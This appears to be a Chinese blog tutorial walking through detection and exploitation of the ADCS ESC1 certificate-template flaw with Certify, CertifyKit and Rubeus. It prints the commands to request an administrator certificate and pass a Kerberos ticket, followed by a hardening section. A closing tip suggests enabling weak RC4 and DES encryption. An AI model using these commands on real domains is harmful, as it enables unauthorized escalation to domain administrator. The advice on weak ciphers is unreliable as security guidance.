当前位置：首页 > article >正文

告别枯燥理论：用GhostPack的Certify和Rubeus，5步搞定Active Directory证书服务(ADCS) ESC1漏洞检测与利用

article 2026/4/8 0:11:07

实战ADCS漏洞利用从零构建ESC1攻击链的完整指南Active Directory证书服务(ADCS)作为企业身份验证基础设施的核心组件其安全配置往往被低估。当证书模板配置不当攻击者可能利用ESC1漏洞实现从普通域用户到域管理员的权限提升。本文将带您搭建实验环境逐步演示如何利用GhostPack工具链完成完整的攻击路径。1. 环境搭建与漏洞原理在开始实战前我们需要理解ESC1漏洞的成因。ADCS中的证书模板如果同时满足三个条件就可能存在权限提升风险允许请求者指定主题备用名称(Subject Alternative Name, SAN)包含客户端身份验证扩展密钥用法(EKU)向普通域用户授予注册权限典型的易受攻击模板配置如下表所示配置项安全设置危险设置使用者名称从Active Directory构建在请求中提供应用程序策略服务器身份验证客户端身份验证安全权限仅限管理员注册认证用户可注册提示实验室环境中建议使用Windows Server 2019作为域控制器和CA服务器避免旧版本可能出现的兼容性问题。2. 漏洞检测与工具准备GhostPack的Certify工具是检测ADCS漏洞的利器。以下是完整的检测流程# 下载并编译Certify git clone https://github.com/GhostPack/Certify cd Certify msbuild /p:ConfigurationRelease检测漏洞模板的命令行操作Certify.exe find /vulnerable典型输出中需要关注三个关键指标msPKI-Certificate-Name-Flag包含ENROLLEE_SUPPLIES_SUBJECTpkiextendedkeyusage包含客户端身份验证安全描述符中Authenticated Users具有Enroll权限3. 证书申请与格式转换发现漏洞模板后使用CertifyKit申请域管理员证书CertifyKit.exe request /ca:CA.test.com\test-CA-CA /template:ESC1 /altname:administrator得到的PEM格式证书需要转换为PFX格式才能用于Kerberos认证openssl pkcs12 -in cert.pem -keyex -CSP Microsoft Enhanced Cryptographic Provider v1.0 -export -out cert.pfx常见错误及解决方案KRB-ERROR (62)检查CA证书是否被域控制器信任访问被拒绝确保证书包含正确的SAN和EKU设置模板不可见验证当前用户是否具有注册权限4. Kerberos票据获取与权限提升使用Rubeus工具将证书注入Kerberos认证流程Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.52.131 /ptt成功执行后您将观察到以下变化当前会话获得域管理员权限可以访问域控上的敏感资源如\\DC\C$能够执行域管理操作如添加用户到特权组5. 防御措施与检测建议为防止此类攻击管理员应采取以下防护措施证书模板加固禁用ENROLLEE_SUPPLIES_SUBJECT标志限制客户端身份验证EKU的使用范围遵循最小权限原则配置注册权限监控与检测审计异常证书申请行为监控Kerberos服务票据请求建立证书模板变更审批流程架构优化将CA服务器与域控制器物理分离实施证书颁发策略限制定期审查证书模板配置在实际渗透测试中遇到KRB-ERROR (62)错误时检查组策略中的加密类型设置往往能解决问题。将以下类型全部启用通常可以恢复认证流程AES256_HMAC_SHA1AES128_HMAC_SHA1RC4_HMAC_MD5DES_CBC_MD5

告别枯燥理论：用GhostPack的Certify和Rubeus，5步搞定Active Directory证书服务(ADCS) ESC1漏洞检测与利用

相关文章：

告别枯燥理论：用GhostPack的Certify和Rubeus，5步搞定Active Directory证书服务(ADCS) ESC1漏洞检测与利用

零基础入门：借助快马平台生成你的第一份单元测试代码

【UE6.5 C++27 调试终极指南】：20年引擎老兵亲授GDB/LLDB/Visual Studio三端协同调试黄金流程

2026加密算法全景解析：从原理到实战，一文读懂加密的核心逻辑

工业C++内存安全漏洞TOP5：从STL误用到裸指针越界，92%的致命事故源于这3个隐藏陷阱

仅限核心架构师查阅：Python无锁GIL环境下的并发成本熔断机制（含实时监控脚本+自动降级策略）

基于MATLAB与机器学习（SVM）的裂缝检测识别系统，附GUI界面、特征参数计算与Excel...

一篇文章帮你认识JDBC！！！

Pandas数据预览优化：告别Pycharm输出窗口的省略号困扰

告别假阳性！用TAGS多模态提示策略，精准提升你的医学影像分割模型性能

Stable Diffusion 3核心技术拆解：手把手带你理解MM-DiT架构与修正流加权

AI批量生成正在悄悄改变我们的日常

WinDiskWriter：让Mac制作Windows启动盘不再是技术难题

基于Matlab/Simulink的直流调速系统PI控制器设计与抗扰性能仿真分析

Python 3.10环境下，用Anaconda搞定Mayavi安装（附VTK、PyQt5版本避坑清单）

VSG阻抗扫描实战：从建模仿真到扫频验证

用PyQt和GraphicsView打造轻量级跑团地图编辑器：从零实现Inkarnate核心功能

einops.reduce隐藏技巧：3行代码实现CNN池化层效果（对比MaxPool2d性能）

Lychee-Rerank与MySQL协同实战：构建智能内容检索系统

Qwen-Image镜像实测：RTX4090D+120G内存，图文理解快到飞起

万象熔炉 | Anything XL参数详解：EulerAncestralDiscreteScheduler原理浅析

新手必看：在快马平台三步生成mobaxterm中文设置图文指南

智能配置助手：让快马ai帮你解决wsl安装openclaw中的依赖与网络难题

OpenClaw电商运营助手：千问3.5-35B-A3B-FP8批量处理商品图并生成详情页文案

Detectron2避坑指南：从环境配置到成功运行实例分割的全流程记录

PyTorch Autograd实战避坑指南：从梯度消失到内存泄漏，新手常踩的5个坑

FlinkX异构数据同步：从安装到实战的5个关键技巧

Labview下的ADC参数测试上位机软件：动态与静态参数计算及波形显示

如何在Windows上轻松安装安卓应用？APK-Installer完整指南

Python下载指南：x86、amd64、ARM、32位、64位到底怎么选？